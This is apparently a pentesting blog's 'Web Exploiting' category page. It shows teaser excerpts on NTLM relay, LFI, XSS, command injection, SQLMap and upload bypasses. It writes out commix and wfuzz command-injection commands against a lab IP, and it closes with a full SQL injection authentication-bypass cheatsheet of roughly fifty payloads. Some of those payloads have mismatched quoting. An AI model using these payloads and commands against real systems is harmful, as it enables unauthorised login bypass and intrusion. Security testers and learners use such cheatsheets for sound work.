Category: Web Exploiting
NTLM and SMB Relay Attack
So this post is basically about why it is important to use Kerberos instead of NTLM and use SMB […]
Local File Inclusion (LFI)
Scripts that take filenames as parameters without sanitizing the user input are typically good candidates for LFI vulnerabilities. For […]
Java Signed Applet Attack
Java Signed Applet Attack is a client-side exploit and is based on a human vulnerability as opposed to […]
XSS – Cross Site Scripting
BeeF Framework: BeeF is native in Kali and is a browser exploitation framework. From the vulnerable website insert below […]
Command Injection – Tools and methods
Below is a list of common tools and methods to test for command injection.
Commix
commix -r /home/workdir/email.req --auth-cred=admin:password --all --batch --level 3
wfuzz
wfuzz -c -z file,/usr/share/wordlists/fuzzdb/attack/os-cmd-execution/Commands-Linux.txt,base64 -b "PHPSESSID=077dn044qmuh2ut41tksedvlv2" -d "check=FUZZ" http://10.10.10.105/diag.php
curl […]
SQLMap
SQLMap is a tool that can be used to automate scanning and exploiting of SQL Injection. Below is some […]
SQL Injection – RCE and LFI Methods
Upload PHP Command Injection
The following can be used to get RCE / command execution when the target is vulnerable to […]
Bypassing File Upload Restrictions
Common techniques to bypass File upload restrictions on web sites. Change the Content-Type parameter in the request header using […]
Bypassing Authentication with SQLi
SQL Injection – Authentication Bypass Cheatsheet
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin' --
admin' #
admin'/*
admin' or "1'='1
admin' or "1'='1'--
admin' or "1'='1'#
admin' or "1'='1'/*
admin'or 1=1 or "'='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ("1'='1
admin') or ("1'='1'--
admin') or ("1'='1'#
admin') or ("1'='1'/*
admin') or "1'='1
admin') or "1'='1'--
admin') or "1'='1'#
admin') or "1'='1'/*
1234 " AND 1=0 UNION ALL SELECT "admin', "81dc9bdb52d04dc20036dbd8313ed055